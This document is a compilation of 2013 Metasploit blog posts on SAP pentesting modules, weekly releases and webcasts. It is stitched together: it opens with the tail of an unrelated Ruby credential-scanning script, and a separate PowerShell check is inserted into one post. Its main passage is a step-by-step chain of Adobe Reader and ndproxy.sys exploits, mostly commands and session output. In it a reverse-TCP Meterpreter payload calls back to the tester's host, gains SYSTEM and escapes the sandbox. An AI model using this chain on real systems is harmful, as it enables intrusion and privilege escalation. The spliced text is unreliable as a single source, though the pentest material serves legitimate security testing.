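          </dict>
        </array>
      </dict>
    </array>
  </dict>
  </plist>
XML

if __FILE__ == $0
  credential_findings(CONSTRUCTED_PLIST).each do |f|
    puts "#{f[:url]}: #{f[:redacted]}  (secret fields: #{f[:secret_fields].join(', ')})"
  end
end
```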

This post is the first in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013.


This year (2013) saw the disclosure of a banking Trojan modified to look for SAP GUI installations: a concerning sign that SAP system hacking has gone into mainstream cybercrime. Once the domain of a few isolated APT attacks, SAP appears to be in the crosshairs of hackers who know just how much sensitive data ERP systems house. With more than 248,500 customers in 188 countries, SAP may see an increase in attacks, and its customers face the threat of data theft, fraud and sabotage.


This trend is not really surprising, given that financial, customer, employee and production data reside in a company's enterprise resource planning (ERP) systems, and they are juicy targets for all sorts of malicious hackers. What's worse, these systems have often grown organically over decades and are so complex that few people understand their organization's entire ecosystem, let alone some of SAP's protocols and components that are not publicly documented. This year, we've made a significant effort to make Metasploit a better SAP pentesting platform, due in large part to an awesome community we should thank again (and again, and again...). Because of their awesome work, there are now more than 50 SAP-related modules in the framework. So, if you meet some of these guys, stop them and say thank you!



Thanks to all of them, the most important SAP infrastructure components are now covered by Metasploit, including:


  • DIAG/RFC communications, with support for the nwrfc wrapper on the Q Metasploit Repository.
  • The SAP Router.
  • The SAP Management Console.
  • The SAP Internet Communication Manager and the SAP Internet Communication Framework.
  • The J2EE Engine.


Not only code has been added to Metasploit. All of these capabilities, and how to use them, have been covered in a free research paper which you can download here: “SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data”. And we have published several webcasts where you can learn more about SAP exploitation with Metasploit from the authors:



So, there are no excuses for not taking SAP infrastructures into account when planning 2014's pentest engagements. The tools are out there!

Recently, FireEye identified and shared information about two vulnerabilities used in the wild to exploit Adobe Reader on Windows XP SP3 systems. The vulnerabilities are:


  • CVE-2013-3346: A use-after-free in Adobe Reader, specifically in the handling of a ToolButton object, which can be exploited through the document's JavaScript. This vulnerability is used to get remote code execution through a malicious PDF document. The code will be executed in a renderer process, inside the Adobe Reader sandbox if available.
  • CVE-2013-5065: An out-of-bounds array access in the Windows kernel driver ndproxy.sys. This vulnerability allows escaping the Adobe Reader sandbox, so that execution of processes and persistence can be easily achieved. As has already been disclosed, remember that the Routing and Remote Access service must be enabled on the target so the NDProxy driver will be available.


Metasploit already has modules available for both vulnerabilities:



In this blog post we're going to explain how to chain both modules to accomplish Adobe Reader Sandbox bypass like in the wild.


  • First of all, a session from a Reader renderer process is needed. In order to get it, the file format or the browser version of the adobe_toolbutton exploit can be used. In this example, the browser version is used:


msf > use exploit/windows/browser/adobe_toolbutton
msf exploit(adobe_toolbutton) > set SRVHOST
msf exploit(adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_toolbutton) > set LHOST
msf exploit(adobe_toolbutton) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 
[*] Using URL:
[*] Server started.
msf exploit(adobe_toolbutton) > [*]  adobe_toolbutton - Gathering target information.
[*]  adobe_toolbutton - request: /vMrwTnexHFjnis/SZLfWc/
[*]  adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to
[*] Meterpreter session 1 opened ( -> at 2013-12-17 16:10:55 -0600

msf exploit(adobe_toolbutton) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 


  • With this session it shouldn't be possible to execute a new process, nor to migrate to an existing one, because the Reader sandbox prevents it:


meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List

 PID   PPID  Name          Arch  Session     User                           Path
 ---   ----  ----          ----  -------     ----                           ----
 3304  3128  AcroRd32.exe        4294967295                                 
 3336  3304  AcroRd32.exe  x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe             4294967295                                 

meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)


  • Here is where the ms_ndproxy local exploit comes to the rescue. Use it with the current session. Remember that the target process is, at the moment, inside the sandbox, so the exploit will elevate the current process (a new process cannot be executed).


meterpreter > background
[*] Backgrounding session 1...
msf exploit(adobe_toolbutton) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set SESSION 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...


  • So even though no new session is created in this case, the original one should belong to SYSTEM if the exploit has been successful:


msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


  • Even though we're still inside a sandboxed process, we should now be able to migrate, and finally execute new processes:


meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...

Process List

 PID   PPID  Name          Arch  Session  User                           Path
 ---   ----  ----          ----  -------  ----                           ----
 3304  3128  AcroRd32.exe  x86   0        JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3336  3304  AcroRd32.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3824  1452  cmd.exe       x86   0        JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe

meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2372 created.
meterpreter > ps -S calc
Filtering on process name...

Process List

 PID   PPID  Name      Arch  Session  User                           Path
 ---   ----  ----      ----  -------  ----                           ----
 2372  3824  calc.exe  x86   0        JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe

meterpreter > 
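The escape above relies on the NDProxy device being reachable from the sandboxed renderer, which the post notes requires the Routing and Remote Access service to be enabled. As an added defender-side check (not code from the original post), this Windows PowerShell function reports that precondition on a host, using Get-WmiObject so it also runs on PowerShell 2.0-era systems such as XP SP3; the service name RemoteAccess, the driver name NDProxy and the Uninstall registry keys are standard Windows locations, and the output property names are my own.

```powershell
# Added defender-side check, not from the original post: does this host expose
# the precondition the NDProxy sandbox escape relies on (RRAS enabled, so that
# \\.\NDProxy is available)? Windows PowerShell only (Get-WmiObject).

function Get-NdproxyExposure {
    # Routing and Remote Access, as Windows registers it (service 'RemoteAccess').
    $rras = Get-WmiObject -Class Win32_Service -Filter "Name='RemoteAccess'"
    # The kernel driver ndproxy.sys, as registered in the system driver list.
    $drv  = Get-WmiObject -Class Win32_SystemDriver -Filter "Name='NDProxy'"

    $rrasState = 'NotInstalled'; $rrasStart = 'NotInstalled'
    if ($rras) { $rrasState = $rras.State; $rrasStart = $rras.StartMode }
    $drvState = 'NotInstalled'
    if ($drv) { $drvState = $drv.State }

    # Installed Adobe Reader entries from the standard Uninstall keys
    # (64-bit hosts keep the 32-bit Reader entry under Wow6432Node).
    $readers = @()
    $roots = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
               'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall')
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($key in (Get-ChildItem $root)) {
            $p = Get-ItemProperty $key.PSPath
            if ($p.DisplayName -like 'Adobe Reader*') {
                $readers += ('{0} {1}' -f $p.DisplayName, $p.DisplayVersion)
            }
        }
    }

    # The driver is reachable if it is already loaded, or if RRAS is running
    # (RRAS loads NDProxy on demand). A non-disabled RRAS could still be
    # started later, so that is reported separately.
    $reachable = ($drvState -eq 'Running') -or ($rrasState -eq 'Running')
    $couldStart = ($rrasStart -ne 'Disabled') -and ($rrasStart -ne 'NotInstalled')

    New-Object PSObject -Property @{
        RrasState          = $rrasState
        RrasStartMode      = $rrasStart
        NdproxyState       = $drvState
        AdobeReader        = ($readers -join '; ')
        NdproxyReachable   = $reachable
        RrasCouldBeStarted = $couldStart
    }
}

Get-NdproxyExposure | Format-List
```

A host where NdproxyReachable is False and RrasCouldBeStarted is False does not offer the escape path shown in the walkthrough, regardless of the Reader version installed.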



Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

New Adobe Reader ROP Gadgets

This week, Juan Vazquez put together a neat one-two exploit punch that involves a somewhat recent Adobe Reader vulnerability (disclosed back in mid-May) and a sandbox escape via an OS privilege escalation bug. I won't give away the surprise there -- he'll have a blog post about it up in a few hours.  Part of the work, though, resulted in some new entries in Metasploit's RopDB; specifically, for Adobe Reader versions 9, 10, and 11.


If you're not already familiar with the RopDB that ships with Metasploit, you can brush up by reading Wei @_sinn3r Chen's write up about ROP chaining from way back in October, 2012, then follow up with his 2013 refresh.  Hopefully, these chains prove to be useful for exploit developers for a while, which should make turnaround for future (and recent past) Reader vulnerabilities quicker and easier.


YouTube Broadcasting

We have a fun module this week just in time for Xmas from Wei @_sinn3r Chen, the multi-platform YouTube broadcaster. To use it, simply point to a YouTube video ID (for example, XAg5KjnAhuU), fire it off on your compromised clients (Windows, Linux, or Mac), and amaze at the full-screen display of the video on your target's active desktops.


The most obvious use of such a module, of course, is for laughs, as you surprise your victims with sudden Rick Astley or Nyan Cat videos.  However, there is bona fide usefulness here, too. The real reason sinn3r popped this module out is that it makes for a great "payload" for a surprise training session. Imagine that you've kicked off a social engineering campaign against your own userbase, and you've gathered your sessions through straight user error (no exploits, no sneakiness, no nothing).  Now, instead of just handing off a report to your HR department head, you can also, on the spot, conduct some training on the compromised folks by immediately showing them what they did wrong.


It's super easy to record instructional videos and slap them up on YouTube; if you use YouTube's privacy settings to mark your video as 'unlisted', they won't get indexed, which makes them about as private as a limited-audience Gists or PasteBins. Not bad, and certainly easier than packing up a whole video payload or setting up your own streaming service.


To me, this seems like a pretty powerful mechanism to train naughty users in how to do the right thing. People get inured to nastygrams from their IT and HR departments really quickly, but a sudden 30 second video ad that tells them that what they just did was unsafe behavior can have a more immediate impact, especially if it's entertaining.


Finally, full-video post-exploit payloads are a hallmark of Hollywood hacking, as described in the original feature request, so this kind of thing can be really useful for regular training sessions or demos; who cares about passing hashes and dumping session credentials; show me funny cat videos and I'm sure to renew your engagement contract!


New Modules

Including those mentioned above, we've got eight new modules this week; six exploits, and two post modules. Four of the six exploits are client-side, which reminds me: like every year now, we fully expect to see an avalanche of new out-of-the-box laptops, desktops, phones, and tablets hit the Internet Christmas morning. If you've been building out machines for your loved ones, do take a second to confirm that you've got your latest client-side patches all squared away before wrapping them up.


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

SAP applications contain a ton of juicy information, making them a great target for malicious attackers who are after intellectual property, financial statements, credit card data, PII and PHI. Breaching SAP systems opens the door for fraud, sabotage, and industrial espionage.


SAP systems have often organically grown and are hard to update, making them a soft target. What's worse, pentesters are often unfamiliar with SAP infrastructures and how to pentest SAP systems. To help with the latter, Rapid7 is hosting some webcasts to introduce penetration testers to some of the key SAP infrastructure components.


This week, we're hosting two free webcasts for you to consider:


SAP Pentesting: From Zero 2 Hero with Metasploit



Dave Hartley aka @nmonkee has recently contributed a number of SAP modules to the Metasploit Framework. In this technical webinar for penetration testers, he is going to present a brief overview of how these modules can be used to go from Zero to Hero to achieve SAPpwnstar status when assessing or encountering SAP systems during engagements. The webcast will provide a very high level overview of common SAP system vulnerabilities and misconfigurations as well as demonstrating how the Metasploit Framework can be leveraged to quickly and easily exploit and compromise misconfigured/vulnerable SAP systems.


Dave is a Principal Security Consultant for MWR InfoSecurity and has been working in the IT industry since 1998. Dave is a published author and has presented his research at several internationally respected security conferences such as 44CON, BSides, Sec-T, ZACON, DeepSec, T2 etc.


There are two showings for this webcast:


Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments


In this technical webinar for penetration testers, Metasploit developers and security researchers Tod Beardsley and Juan Vazquez from the Metasploit team give an introduction to SAP for penetration testers. The webcast introduces viewers to the most important components of SAP and gives an overview of Metasploit modules for SAP provided by community contributors. The webinar includes a live demo and time for Q&A.


Tod Beardsley is the Engineering Manager at Rapid7 for the Metasploit Project, the world-renowned open source penetration testing platform. He has over twenty years of hands-on security knowledge, reaching back to the halcyon days of 2400 baud textfile BBSes and in-band telephony switching. Since then, he has held IT Ops and IT Security positions in large footprint organizations such as 3Com, Dell, and Westinghouse. Today, he is passionate (some might say militant) about open source software development, open source security research, and data liberation. He can often be found on Freenode IRC and Twitter as "todb."


Our second speaker and international hacker of mystery, Juan Vazquez, has been working as a security consultant on both offensive and defensive tasks since 2006. Juan works on the Metasploit project, dividing his time between writing exploits and helping the Metasploit community with their contributions. Juan started contributing to Metasploit 3 years ago as an open source contributor and joined the Rapid7 team in 2011.


There are two showings for this webcast:


Research Report: SAP Penetration Testing Using Metasploit – How to Protect Sensitive ERP Data


Prefer reading to watching a webcast? Check out this in-depth research paper, which explores a number of methods to exploit vulnerabilities within the SAP enterprise resource planning (ERP) system. These methods have been implemented and published in the form of more than 50 modules for Metasploit, a free, open source software for penetration testing. The modules enable companies to test whether their own systems could be penetrated by an attacker.


Download SAP Research Report here

Meterpreter Extended API

This week, we've got some new hotness for Meterpreter in the form of OJ TheColonial Reeves' new Extended API (extapi) functionality. So far, the extended API is for Windows targets only (hint: patches accepted), and here's the rundown of what's now available for your post-exploitation delight:


  • Clipboard Management: This allows for reading and writing from the target's clipboard. This includes not only text, like you'd expect, but a seamless download of files and images as well. Useful for grabbing interesting but temporary data such as passwords or files copied from remote sources.
  • Service Management:  Meterpreter users are familiar with the overview provided by regular 'ps', but the service management interface allows for more detailed readouts of running services; most notably, DACLs, load order group, the start up status, and if that service can interact with the desktop.
  • Window Management: Gives the ability to easily enumerate all open windows. This can help penetration testers discover if a particular target is worth VNC'ing in on at the moment.


In addition to all this, the Extended API structure makes it a handy place to start prototyping new Meterpreter functionality for Meterpreter hackers who aren't named OJ. It's pretty well organized from the get-go and doesn't require refactoring to core Meterpreter functionality to get something put together and demo-able quickly. So, if you've got an idea of what you'd like to see Meterpreter make easier that's relevant to your particular pen-testing workflow, this is a great place to start.


New HttpServer / HttpClient HOWTO

Not too long ago, we announced Wei @_sinn3r Chen's Browser Exploit Server, a nice Ruby mixin that consolidates a lot of the grunt work behind developing exploits. This week, Wei has fleshed out more of the exploit dev documentation with a nice, compact HOWTO-style guide on writing modules that leverage the strengths of the revised HttpServer and HttpClient mixins, so read up on it here.


I've been bugging sinn3r to put together some YouTube videos on the process of exploit dev as well, complete with the requisite thumpa-thumpa music, but you are welcome to beat him to it by following his documentation for your next browser exploit. The kids love the YouTube, and watching exploit devs type is apparently an effective teaching technique for some.


SAP for People Closer to GMT

If you missed last week's SAP hacking webcast by Juan Vazquez, Christian Kirsch, and yours truly, we'll be hosting it again live next week. You can register here, and it'll be held mid-afternoon for those of you who are observing a European time zone. We hear SAP is big over there, so we'll be getting online early in the AM here in Austin to make sure you all can participate in our overview of the state of the art of SAP reconnaissance and exploitation with Metasploit.


New Modules

It's an even split this week between exploit and non-exploit modules, with eight total. Rails has another DoS that we exercise this week, thanks to sinn3r's Rails Action View auxiliary module which exploits CVE-2013-6414; now would be a fine time to check your Rails version and update accordingly to get the fix.


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.


We've been all SAP all the time here in the Independent Nations of Metasploit, and expect to be for the rest of the week. You might recall that Metasploit exploit dev, Juan Vazquez published his SAP survey paper a little while back; on Tuesday, we did a moderated twitter chat on the hashtag #pwnSAP with the major SAP-focused Metasploit contributors Bruno Morrison, Chris John Riley, and Dave Hartley; and today (Thursday, December 5), Juan and I will be hosting a webcast on the various and sundry SAP exposures that Metasploit covers, and There Will Be Demos and Q&A, so it should be fun.


The whole thing has been pretty eye-opening for me; there's been a bunch of movement in the research over the last 18-24 months or so, and I'm delighted that so many talented people are making noise about this in the form of Metasploit modules. Hopefully all this will raise some awareness of the risks and exposures involved with running huge, complex, interconnected systems like ERP in general.


Silverlight Exploit

In other (non-SAP) news, this week, we're shipping our first ever Silverlight exploit, which exploits MS12-022 (aka, CVE-2013-0074). That's exciting. Use your DNS MITM attacks to jack the Netflix domains, wait for Orange is the New Black fans to connect, and profit!


It's important to know that the vulnerability is in Silverlight proper, and not IE, so while our exploit targets Microsoft Internet Explorer only today, the vulnerability is actually cross-platform. So, now that we've done this groundwork of demoing how to write a Silverlight exploit in Metasploit, all we need now is some enterprising young researcher to port this to a working Apple implementation. Have at it!


New Modules

I know, I know, last week we kind of cheated you out of your usual complement of new modules, thanks to the Ruby float bug. To make it up to you, we have 14 new modules this week, including the Silverlight module mentioned above. Have at it! There are a lot of neat new attacks in there, so thanks again to our beloved community contributors for their efforts on these.


Exploit modules


Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

If you’re conducting security assessments on enterprise networks, chances are that you’ve run into SAP systems. In this blog post, I’d like to give you an introduction to SAP and ABAP to help you with your security audit.


The full SAP solution (ERP or SAP Business Suite) consists of several components. However, to manage the different areas of a large enterprise, probably one of the better known components or features of the SAP solution is the development system based on ABAP, the language used to build business applications on the SAP platform.


The traditional way to execute ABAP code is to use a transaction, for example, from any existing SAP client (which will be reviewed later):




One way to simplify the concept of the SAP platform is to think of it as an application server. Most readers are probably familiar with Java-related application servers, so it’s easy to think of SAP as an ABAP application server. In fact, SAP is capable of running ABAP applications as well as applications written in Java. The name of SAP’s application server is SAP NetWeaver...


If you’d like to know more about this platform and how to pentest it with Metasploit, get your free research paper now "SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data."


If you'd like to join a live discussion on the topic, we're also hosting a tweet chat tomorrow, December 3, at noon ET under the hashtag #pwnSAP. Or you can register for our webcast on Thursday, December 6 at 2:00pm ET, "Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments."
